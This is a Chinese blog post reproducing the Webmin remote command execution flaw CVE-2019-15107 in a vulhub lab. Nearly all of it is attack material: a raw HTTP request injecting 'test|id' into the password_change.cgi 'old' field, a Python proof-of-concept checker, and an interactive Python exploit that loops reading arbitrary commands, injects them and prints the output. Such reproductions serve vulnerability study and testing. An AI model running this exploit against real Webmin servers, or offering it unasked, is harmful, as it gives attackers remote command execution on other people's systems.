Webmin 远程命令执行漏洞(CVE-2019-15107)复现

于 2022-05-03 18:16:50 发布
阅读量772 收藏 2
点赞数
文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/124559066
版权

一、环境搭建

本次采用vulhub进行复现
在这里插入图片描述

二、复现过程

POST /password_change.cgi HTTP/1.1
Host: 192.168.252.145:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://192.168.252.145:10000/
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://192.168.252.145:10000
Connection: close
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user=wwwq&pam=&expired=2&old=test|id&new1=test2&new2=test2

在这里插入图片描述

三、POC和EXP

引用:https://blog.csdn.net/wangqiao258/article/details/120591837

POC

import requests


requests.packages.urllib3.disable_warnings() #去除告警

url = "https://192.168.252.145:10000/password_change.cgi"



headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}

data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
#  data  中执行的   echo wwwq|md5sum  命令

res = requests.post(url,  data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text:   #   wwwq 的 md5 值
    print("CVE-2019-15107 存在")

在这里插入图片描述

EXP

import requests,re


requests.packages.urllib3.disable_warnings() #去除告警

url = "https://192.168.252.145:10000/password_change.cgi"



headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}

data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
#  data  中执行的   echo wwwq|md5sum  命令

res = requests.post(url,  data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text:   #   wwwq 的 md5 值
    print("CVE-2019-15107 存在")

    while 1 :
        data["old"] = "test|" + input("请输入你要执行的命令:")   # 输入要执行的命令且替换 data 中的执行的命令

        exp_res  = requests.post(url,  data=data,headers=headers, verify=False)
        rce_res = re.findall("incorrect([\s\S]*)</h3>",exp_res.text)  # 正则提取结果
        print(rce_res[0])

在这里插入图片描述

hana-u
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值